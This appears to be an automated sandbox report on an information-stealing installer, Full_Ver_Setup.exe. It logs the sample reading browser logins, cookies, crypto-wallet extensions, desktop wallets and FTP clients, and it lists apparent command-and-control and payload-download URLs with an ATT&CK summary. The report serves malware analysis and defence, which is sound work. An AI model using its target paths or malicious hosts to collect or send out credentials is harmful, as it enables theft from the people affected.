              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: Yara match | File source: Process Memory Space: Full_Ver_Setup.exe PID: 6476, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match | File source: Process Memory Space: Full_Ver_Setup.exe PID: 6476, type: MEMORYSTR
Source: Yara match | File source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic; a number in parentheses is the report's count badge shown on that technique, techniques without a number were not matched)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
Execution: Windows Management Instrumentation (2), Command and Scripting Interpreter (22), PowerShell (2), Cron, Launchd, Scheduled Task, Systemd Timers
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
Privilege Escalation: Process Injection (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
Defense Evasion: Virtualization/Sandbox Evasion (121), Process Injection (1), Deobfuscate/Decode Files or Information (11), Obfuscated Files or Information (3), DLL Side-Loading (1), Steganography, Compile After Delivery
Credential Access: OS Credential Dumping (2), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
Discovery: Query Registry (1), Security Software Discovery (121), Virtualization/Sandbox Evasion (121), Process Discovery (2), Application Window Discovery (1), File and Directory Discovery (1), System Information Discovery (32)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
Collection: Archive Collected Data (1), Data from Local System (41), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
Command and Control: Encrypted Channel (11), Ingress Tool Transfer (3), Non-Application Layer Protocol (4), Application Layer Protocol (115), Fallback Channels, Multiband Communication, Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery
Antivirus detection

Source | Detection | Scanner | Label | Link
Full_Ver_Setup.exe | 13% | Virustotal | - | Browse
No Antivirus matches
Contacted domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
fannleadyn.click | 104.21.63.229 | true | true | - | unknown
kliptizq.shop | 104.21.84.113 | true | false | - | high
neqi.shop | 194.58.112.174 | true | false | - | unknown
Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
necklacebudi.lat | false | - | high
fannleadyn.click | true | - | unknown
aspecteirs.lat | false | - | high
sustainskelet.lat | false | - | high
crosshuaht.lat | false | - | high
rapeflowwj.lat | false | - | high
energyaffai.lat | false | - | high
https://kliptizq.shop/int_clp_ldr_sha.txt | false | - | unknown
grannyejh.lat | false | - | high
discokeyus.lat | false | - | high
https://fannleadyn.click/api | true | - | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/ | powershell.exe, 00000004.00000002.2180106835.0000000005735000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://fannleadyn.click/1X | Full_Ver_Setup.exe, 00000000.00000003.1992514646.000000000082A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/ac/?q= | Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://kliptizq.shop/ | Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://fannleadyn.click/apiF9 | Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.cloudflare.com/learning/access-management/phishhZ | powershell.exe, 00000004.00000002.2180106835.00000000057D9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://fannleadyn.click:443/api(( | Full_Ver_Setup.exe, 00000000.00000003.1900728110.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.cloudflare.com/5xx-error-landingmancet | powershell.exe, 00000004.00000002.2178588154.0000000003476000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | Full_Ver_Setup.exe, 00000000.00000003.1875194044.0000000003FA1000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1875527710.0000000003F55000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.cloudflare.com/learning/access-management/phishing-attack/class=cf-btnstyle=background-c | powershell.exe, 00000004.00000002.2178588154.000000000344F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178588154.00000000034D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2180079470.00000000050E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2179797544.0000000003760000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2184472007.0000000007B59000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://fannleadyn.click/Y | Full_Ver_Setup.exe, 00000000.00000003.1873688893.00000000007DD000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://fannleadyn.click/apiv | Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1992272379.0000000000843000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://kliptizq.shop/int_clp_ldr_sha.txtf1 | Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://neqi.shop/sdgjyut/psh.txt | Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000004.00000002.2180106835.0000000005431000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.c.lencr.org/0 | Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | Full_Ver_Setup.exe, 00000000.00000003.1875527710.0000000003F32000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.cloudflare.com/learning/access-management/phish | powershell.exe, 00000004.00000002.2180106835.00000000057D9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.cloudflare.com/5xx-error-landinghZ | powershell.exe, 00000004.00000002.2180106835.00000000057D9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://fannleadyn.click/x | Full_Ver_Setup.exe, 00000000.00000003.1873688893.00000000007DD000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://support.mozilla.org/products/firefoxgro.all | Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.2180106835.0000000005431000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://fannleadyn.click/r | Full_Ver_Setup.exe, 00000000.00000003.1946447013.000000000082A000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1971013794.0000000000824000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://fannleadyn.click/s | Full_Ver_Setup.exe, 00000000.00000003.1971013794.0000000000832000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1922392393.0000000000832000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.2012249509.0000000000832000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1946447013.0000000000834000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1992514646.0000000000832000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.innosetup.com/ | Full_Ver_Setup.exe | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.cloudflare.com/learning/access-management/phishing-atX) | powershell.exe, 00000004.00000002.2180106835.00000000057D9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://neqi.shop/sdgjyut/psh.txtY) | Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000085E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://neqi.shop/ | Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://fannleadyn.click:443/apiell | Full_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000832000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://ocsp.rootca1.amazontrust.com0: | Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | Full_Ver_Setup.exe, 00000000.00000003.1875194044.0000000003FA1000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1875527710.0000000003F55000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://fannleadyn.click:443/api_PROFILE_STRING=Internet | Full_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000832000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.2012249509.0000000000832000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.cloudflare.com/5xx-error-landing | powershell.exe, 00000004.00000002.2180106835.0000000005735000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://kliptizq.shop:443/int_clp_ldr_sha.txtn | Full_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000832000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.cloudflare.com/5xx-error-landingid=brand_linktarget=_blank | powershell.exe, 00000004.00000002.2178588154.000000000344F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178588154.00000000034D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2180079470.00000000050E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2179797544.0000000003760000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2184472007.0000000007B59000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://neqi.shop/Y | Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://fannleadyn.click/api2 | Full_Ver_Setup.exe, 00000000.00000003.1873688893.00000000007DD000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://neqi.shop:443/sdgjyut/psh.txt | Full_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000832000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://neqi.shop/sdgjyut/psh.txtc | Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://fannleadyn.click/apiDZ | Full_Ver_Setup.exe, 00000000.00000003.2012801885.0000000000862000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.2012326508.0000000000861000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
